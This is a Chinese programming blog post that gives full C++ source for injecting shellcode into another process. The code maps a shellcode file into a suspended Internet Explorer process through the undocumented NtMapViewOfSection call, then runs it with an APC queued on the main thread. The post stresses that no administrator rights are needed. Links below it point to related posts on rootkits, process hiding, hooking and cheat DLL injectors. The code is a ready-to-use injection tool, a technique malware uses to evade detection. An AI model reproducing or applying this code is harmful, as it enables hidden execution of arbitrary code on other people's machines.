ring3-NtMapViewOfSection注入

最新推荐文章于 2024-04-18 10:09:07 发布
最新推荐文章于 2024-04-18 10:09:07 发布
阅读量1.2k 收藏
点赞数
分类专栏: Windows编程

新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求

[cpp]  view plain  copy
  1. #define _WIN32_WINNT 0x0400  
  2. #include <windows.h>  
  3.   
  4. typedef LONG NTSTATUS, *PNTSTATUS;  
  5. #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)  
  6.   
  7. typedef enum _SECTION_INHERIT   
  8. {  
  9. ViewShare = 1,  
  10. ViewUnmap = 2  
  11. } SECTION_INHERIT;  
  12.   
  13. typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLEHANDLELPVOIDULONGSIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONGULONG );  
  14.   
  15. func_NtMapViewOfSection NtMapViewOfSection = NULL;  
  16.   
  17.   
  18. LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,   
  19. DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )    
  20. {  
  21. NTSTATUS Status;  
  22. LARGE_INTEGER SectionOffset;  
  23. ULONG ViewSize;  
  24. ULONG Protect;  
  25. LPVOID ViewBase;  
  26.   
  27.   
  28. // 转换偏移量  
  29. SectionOffset.LowPart = dwFileOffsetLow;  
  30. SectionOffset.HighPart = dwFileOffsetHigh;  
  31.   
  32. // 保存大小和起始地址  
  33. ViewBase = lpBaseAddress;  
  34. ViewSize = dwNumberOfBytesToMap;  
  35.   
  36. // 转换标志为NT保护属性  
  37. if (dwDesiredAccess & FILE_MAP_WRITE)  
  38. {  
  39. Protect = PAGE_READWRITE;  
  40. }  
  41. else if (dwDesiredAccess & FILE_MAP_READ)  
  42. {  
  43. Protect = PAGE_READONLY;  
  44. }  
  45. else if (dwDesiredAccess & FILE_MAP_COPY)  
  46. {  
  47. Protect = PAGE_WRITECOPY;  
  48. }  
  49. else  
  50. {  
  51. Protect = PAGE_NOACCESS;  
  52. }  
  53.   
  54. //映射区段  
  55. Status = NtMapViewOfSection(hFileMappingObject,  
  56. hProcess,  
  57. &ViewBase,  
  58. 0,  
  59. 0,  
  60.             &SectionOffset,  
  61. &ViewSize,  
  62.             ViewShare,  
  63.             0,  
  64. Protect);  
  65. if (!NT_SUCCESS(Status))  
  66. {  
  67. // 失败  
  68. return NULL;  
  69. }  
  70.   
  71. //返回起始地址  
  72.    return ViewBase;  
  73. }  
  74.   
  75. int WINAPI WinMain (HINSTANCEHINSTANCELPSTRint)  
  76. {  
  77. HMODULE hDll = LoadLibrary( "ntdll.dll" );  
  78.   
  79. NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");  
  80.   
  81. // 取ShellCode,任何你想实现的  
  82. HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);  
  83.   
  84. HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);  
  85.   
  86. // 启动目标进程  
  87. STARTUPINFO st;   
  88. ZeroMemory (&st, sizeof(st));  
  89. st.cb = sizeof (STARTUPINFO);  
  90.   
  91. PROCESS_INFORMATION pi;  
  92. ZeroMemory (&pi, sizeof(pi));  
  93.   
  94. CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);  
  95.   
  96.   
  97. // 注入shellcode到目标进程地址空间  
  98. LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);  
  99.   
  100. // 创建一个新的能够在目标线程恢复是首先执行的APC  
  101. QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);  
  102. ResumeThread (pi.hThread);  
  103. CloseHandle (hFile);  
  104. CloseHandle (hMappedFile);  
  105. CloseHandle (pi.hThread);  
  106. CloseHandle (pi.hProcess);  
  107. return 0;  
  108. }  
cosmoslife
关注
专栏目录
[注入] - NtMapViewOfSection
墨鱼菜鸡
08-20 493
背景 新的注入方式:利用一个未公开函数 NtMapViewOfSection 在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的...
NtMapViewOfSection注入
weixin_30800987的博客
07-29 384
新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求 #define _WIN32_WINNT 0x0400 #include <windows.h> typedef LONG NTSTATUS, *PN...
内核 HOOK ZwMapViewOfSection
残酷な天使
10-06 3699
转自:http://lwglucky.blog.51cto.com/1228348/284829  有部分模块加载时会调用ZwMapViewOfSection,比如进程创建时映射N份DLL到自己的虚拟空间中去.我们替换SSDT中的这个函数,过滤出是加载Kernel32.
NtUnmapViewOfSection
08-21
NtUnmapViewOfSection演示程序
ring3-kit:使用NT API挂钩从任务管理器隐藏进程(NtQuerySystemInformation
05-27
一个简单的Ring-3(用户模式)rootkit。 如何 将API函数NtQuerySystemInformation()与我们自己的函数挂钩,该函数对任务管理器隐藏进程 挂钩函数被调用 DLL被注入Taskmgr.exe,因此有一个虚拟内存空间可用于执行...
ring-basic-authentication:强制执行基本身份验证的环形中间件
01-29
下面将详细介绍Ring、Clojure、基本身份验证以及如何使用Ring-Basic-Authentication中间件。 **Ring概述** Ring是Clojure Web开发的核心组件,它提供了一个简洁的API来处理HTTP请求和响应。Ring不直接构建完整的Web...
Win7-ring3-write-directly.rar_site:www.pudn.com_硬盘
09-24
标题中的“Win7-ring3-write-directly.rar”指的是在Windows 7操作系统环境下,关于Ring 3级别的应用程序直接对硬盘进行写操作的技术分析。在计算机操作系统中,Ring 3是用户模式下最高级别的权限,通常应用软件运行...
x64 Ring3_Dll注入-易语言
06-12
DLL注入工具有很多,但是也有很多无法注入系统进程如explorer.exe,notepad.exe等,特别是Win7以上平台。此注入工具核心注入部分使用NtCreateThreadEx + LdrLoadDlll方式实现,特色在于比一般的远程线程注入稳定,...
elden-ring-deluxe-edition-v-1_06-dlc-2022-pc-repack-ot-chovka.torrent
10-31
elden-ring-deluxe-edition-v-1_06-dlc-2022-pc-repack-ot-chovka.torrent
onetap_onetap.dll官网_onetap注入器_onetap_onetap的dll_onetap怎么注入_
10-03
dll文件需自备注入器,大神门自己领走阿萨德ad的的
Ring3注入总结及编程实现【有码】
richard1230的博客
03-26 586
Ring3注入总结 导入表注入 挂起线程注入 挂起进程注入 调试器注入 注册表注入 钩子注入 APC注入 远程线程注入 输入法注入 DLL劫持 关于Ring3下的反注入思路 导入表注入 钩子注入 远程线程注入 DLL劫持: Ring3注入总结 导入表注入 静态注入的方法。修改PE文件,添加一个新节,修改导入表添加一个新的DLL实现注入。 挂起线程注入 ...
通过挂钩NtCreateSection监控可执行模块
jinghuainfo
09-01 172
&lt;!-- [if gte mso 9]&gt;&lt;xml&gt; &lt;w:WordDocument&gt; &lt;w:View&gt;Normal&lt;/w:View&gt; &lt;w:Zoom&gt;0&lt;/w:Zoom&gt; &lt;w:PunctuationKerning /&gt; &lt;w:Drawi
NT中直接访问物理内存
11-13 3565
P.bhw98{ PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-SIZE: 9pt; PADDING-BOTTOM: 0px; MARGIN: 10px 0px 5px; LINE-HEIGHT: normal; PADDING-TOP: 0px; FONT-FAMIL
进程注入系列Part 1 常见的进程注入手段
最新发布
蛇矛实验室
04-18 1122
进程注入是一种众所周知的技术,恶意程序利用它在进程的内存中插入并执行代码。进程注入是一种恶意程序广泛使用的防御规避技术。大多数情况下,恶意程序使用进程注入来动态运行代码,这意味着实际的恶意代码不需要直接写入磁盘上的文件中,以避免被防病毒软件的静态检测所发现。简单来说,进程注入就是将一段数据从一个进程传输到另一个进程的方法,这种注入过程可以发生在执行操作的同一进程(自注入)上,也可发生在外部进程上。
[翻译]远程代码注入新技术
晓斌的博客
03-09 878
译文作者:zshoucheng原始出处:http://www.rootkit.com/newsread.php?newsid=715远程代码注入新技术By: yogle    我研究出了一种新的在远程进程中执行代码的可能性,就是利用一个未文档函数在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求
ring0下注入DLL
yuanxiaobo007的专栏
01-24 2846
最近有在做一个东西,需要在ring0下拦截进程启动并注入DLL(dll用于hook ring3下的API),很多种实现方法,此处采用sudami大神提供的思路,另一位大侠提供的参考代码。虽然这个东西没什么技术含量,但对于我这种刚入门内核的人还是搞了很久才做出来,蓝屏很多,要注意很多细节. 思路:进程创建完时是一个空水壶,里面没有沸腾的热水(threads),于是系统调用NtCreateThrea
枚举进程(CreateToolhelp32Snapshot函数剖析)
KOOKNUT的博客
03-13 805
之前写过一些枚举进程的代码,这两天正在回顾之前学习的代码,看到了CreateToolhelp32Snapshot函数,就顺便来看看它的具体实现吧。 实现枚举进程信息的这个过程看起来是比较easy的,只不过是一些Windows的API函数罢了: CreateToolhelp32Snapshot Process32First Process32Next 就利用这三个函数,便可实现当前系统进程的枚举...
Hide Your SSDT HOOK
ccx_john的专栏
10-26 914
原始出处:http://www.rootkit.com/newsread.php?newsid=922 信息来源:0GiNr,零下安全 信心无限 文章作者:xrayn 译文作者:wangweinoo1 译者声明:本译版首发于0GiNr,后由wangweinoo1极小规模修改后发于EST,转载请保持信息完整 文章目录: 0.前言(Preface)by wangweinoo1 1.目
Windows Ring3层DLL注入技术总结
"这篇文章除了介绍Windows x86/x64 Ring3层Dll注入的概念,还总结了六种Dll注入技术,并提供了权限提升的函数示例。" 本文主要探讨的是Windows操作系统中的Dll注入技术,特别是在Ring3层,即用户模式下的注入方法。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值